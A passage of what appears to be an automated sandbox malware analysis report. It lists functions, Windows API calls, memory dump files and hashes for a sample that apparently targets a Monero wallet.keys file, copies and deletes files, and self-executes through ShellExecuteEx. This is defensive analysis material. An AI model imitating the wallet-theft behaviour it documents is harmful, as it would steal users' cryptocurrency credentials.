                                  • RegCloseKey.ADVAPI32(?), ref: 00A87E92
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: ef16604fa7ac113bdd3f43fdd5c92f00792c26fda4c9be072cf63140b2c5ff28
                                  • Instruction ID: e7cf95f164d1910f141e63f99e77176e288a812930f1c3e46a1d7bad52613b8e
                                  • Opcode Fuzzy Hash: ef16604fa7ac113bdd3f43fdd5c92f00792c26fda4c9be072cf63140b2c5ff28
                                  • Instruction Fuzzy Hash: 19115EB1A44205FBDB04DF94DD49FBFBBB8FB04B10F204259F605A7680D77558008BA1
                                  Function 00A89260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • StrStrA.SHLWAPI(0068E8B0,?,?,?,00A8140C,?,0068E8B0,00000000), ref: 00A8926C
                                  • lstrcpyn.KERNEL32(00CBAB88,0068E8B0,0068E8B0,?,00A8140C,?,0068E8B0), ref: 00A89290
                                  • lstrlen.KERNEL32(?,?,00A8140C,?,0068E8B0), ref: 00A892A7
                                  • wsprintfA.USER32 ref: 00A892C7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpynlstrlenwsprintf
                                  • String ID: %s%s
                                  • API String ID: 1206339513-3252725368
                                  • Opcode ID: 4e656ca32535366bf5c2697ccf94f04793ac140f2c2699c07a170b881f0daef7
                                  • Instruction ID: f5178777421f907c5476ee5c448152d1d7500e15684985ffe2d48b0fdc57356d
                                  • Opcode Fuzzy Hash: 4e656ca32535366bf5c2697ccf94f04793ac140f2c2699c07a170b881f0daef7
                                  • Instruction Fuzzy Hash: 90011E75500108FFCB04DFECC988EEE7BB9EB48351F148248F9499B200C631AA40DB91
                                  Function 00A712A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A712B4
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00A712BB
                                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00A712D7
                                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00A712F5
                                  • RegCloseKey.ADVAPI32(?), ref: 00A712FF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: e0095dfa1d74cd2e81cdbd4cecaf8a535ca503048f30518a134bdcb91ce4e130
                                  • Instruction ID: 6cfa67787201e8abca93008d2ae2583bff6225b3508d210314dbbc17f9ba7621
                                  • Opcode Fuzzy Hash: e0095dfa1d74cd2e81cdbd4cecaf8a535ca503048f30518a134bdcb91ce4e130
                                  • Instruction Fuzzy Hash: C001E6B5A40208BBDB04DFD4DC59FAEB7BCEB48705F108155FA45972C0DA759A018F91
                                  Function 00A8C84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: String___crt$Type
                                  • String ID:
                                  • API String ID: 2109742289-3916222277
                                  • Opcode ID: bd51a414794bbe7ddc18894878df64802c8a2ba7c6e937cb12be8fecf10c55d2
                                  • Instruction ID: 89c2d994d7e859270c3f38e76e7e604463a5b380ad4be234d07b05dfe83f0539
                                  • Opcode Fuzzy Hash: bd51a414794bbe7ddc18894878df64802c8a2ba7c6e937cb12be8fecf10c55d2
                                  • Instruction Fuzzy Hash: 5C4106B110079C5EDB21AB24CD85FFBBBF89F45718F1444E8E9CA86182E2719A44CF30
                                  Function 00A86630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00A86663
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                    • Part of subcall function 00A8A9B0: lstrlen.KERNEL32(?,006888B8,?,\Monero\wallet.keys,00A90E17), ref: 00A8A9C5
                                    • Part of subcall function 00A8A9B0: lstrcpy.KERNEL32(00000000), ref: 00A8AA04
                                    • Part of subcall function 00A8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A8AA12
                                    • Part of subcall function 00A8A8A0: lstrcpy.KERNEL32(?,00A90E17), ref: 00A8A905
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00A86726
                                  • ExitProcess.KERNEL32 ref: 00A86755
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                  • String ID: <
                                  • API String ID: 1148417306-4251816714
                                  • Opcode ID: fe1b690dd264026c08aba21bf98831d6e450346d81687c64783d5ca9970b452b
                                  • Instruction ID: 5b8eb689a94f0373838595f57b857a780a685f1866c332c3fd61bfdd0f72dcaa
                                  • Opcode Fuzzy Hash: fe1b690dd264026c08aba21bf98831d6e450346d81687c64783d5ca9970b452b
                                  • Instruction Fuzzy Hash: 633129B1D01218AAEB14FB90DD92BDEB778AF14300F804189F20967191DF786B49CF6A
                                  Function 00A887C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00A90E28,00000000,?), ref: 00A8882F
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00A88836
                                  • wsprintfA.USER32 ref: 00A88850
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                                  • String ID: %dx%d
                                  • API String ID: 1695172769-2206825331
                                  • Opcode ID: 635d0a3295cc16d9bc4d469f76f2b712c6ef0a1604bda0da31db020bc31f4242
                                  • Instruction ID: 4093c47d78b3cfbc39e55df253e66b9365cf909ef85e25db02c8889414ee1904
                                  • Opcode Fuzzy Hash: 635d0a3295cc16d9bc4d469f76f2b712c6ef0a1604bda0da31db020bc31f4242
                                  • Instruction Fuzzy Hash: F7211FB1A44208BFDB04DF98DD49FAEBBB8FB48711F104619F645A76C0C779A901CBA1
                                  Function 00A88D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00A8951E,00000000), ref: 00A88D5B
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00A88D62
                                  • wsprintfW.USER32 ref: 00A88D78
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcesswsprintf
                                  • String ID: %hs
                                  • API String ID: 769748085-2783943728
                                  • Opcode ID: 10483da2fce5441bb0f368e38b76638ca317634a21fd55468f9b82e4ddc7da1b
                                  • Instruction ID: d95c78040b81ff14059fa42b4319efdadfc2f7dafd42f49a1990f5e6483ec22d
                                  • Opcode Fuzzy Hash: 10483da2fce5441bb0f368e38b76638ca317634a21fd55468f9b82e4ddc7da1b
                                  • Instruction Fuzzy Hash: 8DE0ECB5A44208BFDB10DB94DD0EF6D77BCEB44702F004294FD4997680EA729E109B96
                                  Function 00A7A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                    • Part of subcall function 00A8A9B0: lstrlen.KERNEL32(?,006888B8,?,\Monero\wallet.keys,00A90E17), ref: 00A8A9C5
                                    • Part of subcall function 00A8A9B0: lstrcpy.KERNEL32(00000000), ref: 00A8AA04
                                    • Part of subcall function 00A8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A8AA12
                                    • Part of subcall function 00A8A8A0: lstrcpy.KERNEL32(?,00A90E17), ref: 00A8A905
                                    • Part of subcall function 00A88B60: GetSystemTime.KERNEL32(00A90E1A,0068E2E8,00A905AE,?,?,00A713F9,?,0000001A,00A90E1A,00000000,?,006888B8,?,\Monero\wallet.keys,00A90E17), ref: 00A88B86
                                    • Part of subcall function 00A8A920: lstrcpy.KERNEL32(00000000,?), ref: 00A8A972
                                    • Part of subcall function 00A8A920: lstrcat.KERNEL32(00000000), ref: 00A8A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00A7A2E1
                                  • lstrlen.KERNEL32(00000000,00000000), ref: 00A7A3FF
                                  • lstrlen.KERNEL32(00000000), ref: 00A7A6BC
                                    • Part of subcall function 00A8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A8A7E6
                                  • DeleteFileA.KERNEL32(00000000), ref: 00A7A743
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: e0864644a8ae24d473428235f1f3b79fee90516eb3cf78a7b9273d2824f2a27b
                                  • Instruction ID: 1ef85a82270610b553e21c38054a506cec8f208dc5547512975b63c3cddcb935
                                  • Opcode Fuzzy Hash: e0864644a8ae24d473428235f1f3b79fee90516eb3cf78a7b9273d2824f2a27b
                                  • Instruction Fuzzy Hash: DAE1D472D101189AEB05FBA4DE92EEE733CAF64300F50855AF51776091EF386A49CB72
                                  Function 00A7D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                    • Part of subcall function 00A8A9B0: lstrlen.KERNEL32(?,006888B8,?,\Monero\wallet.keys,00A90E17), ref: 00A8A9C5
                                    • Part of subcall function 00A8A9B0: lstrcpy.KERNEL32(00000000), ref: 00A8AA04
                                    • Part of subcall function 00A8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A8AA12
                                    • Part of subcall function 00A8A8A0: lstrcpy.KERNEL32(?,00A90E17), ref: 00A8A905
                                    • Part of subcall function 00A88B60: GetSystemTime.KERNEL32(00A90E1A,0068E2E8,00A905AE,?,?,00A713F9,?,0000001A,00A90E1A,00000000,?,006888B8,?,\Monero\wallet.keys,00A90E17), ref: 00A88B86
                                    • Part of subcall function 00A8A920: lstrcpy.KERNEL32(00000000,?), ref: 00A8A972
                                    • Part of subcall function 00A8A920: lstrcat.KERNEL32(00000000), ref: 00A8A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00A7D481
                                  • lstrlen.KERNEL32(00000000), ref: 00A7D698
                                  • lstrlen.KERNEL32(00000000), ref: 00A7D6AC
                                  • DeleteFileA.KERNEL32(00000000), ref: 00A7D72B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: e2a749375f90571f772b2972e8cf1e34bca38699193a31721595ff3dabdae5ea
                                  • Instruction ID: 99355752618a5c85dc933472b0400421357cfc7cdff20270cd2d9e35834beb69
                                  • Opcode Fuzzy Hash: e2a749375f90571f772b2972e8cf1e34bca38699193a31721595ff3dabdae5ea
                                  • Instruction Fuzzy Hash: 0291E772D101049BEB08FBA4DE96EEE7338AF64300F50455AF517B6051EF386A49CB72
                                  Function 00A7D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                    • Part of subcall function 00A8A9B0: lstrlen.KERNEL32(?,006888B8,?,\Monero\wallet.keys,00A90E17), ref: 00A8A9C5
                                    • Part of subcall function 00A8A9B0: lstrcpy.KERNEL32(00000000), ref: 00A8AA04
                                    • Part of subcall function 00A8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A8AA12
                                    • Part of subcall function 00A8A8A0: lstrcpy.KERNEL32(?,00A90E17), ref: 00A8A905
                                    • Part of subcall function 00A88B60: GetSystemTime.KERNEL32(00A90E1A,0068E2E8,00A905AE,?,?,00A713F9,?,0000001A,00A90E1A,00000000,?,006888B8,?,\Monero\wallet.keys,00A90E17), ref: 00A88B86
                                    • Part of subcall function 00A8A920: lstrcpy.KERNEL32(00000000,?), ref: 00A8A972
                                    • Part of subcall function 00A8A920: lstrcat.KERNEL32(00000000), ref: 00A8A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00A7D801
                                  • lstrlen.KERNEL32(00000000), ref: 00A7D99F
                                  • lstrlen.KERNEL32(00000000), ref: 00A7D9B3
                                  • DeleteFileA.KERNEL32(00000000), ref: 00A7DA32
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
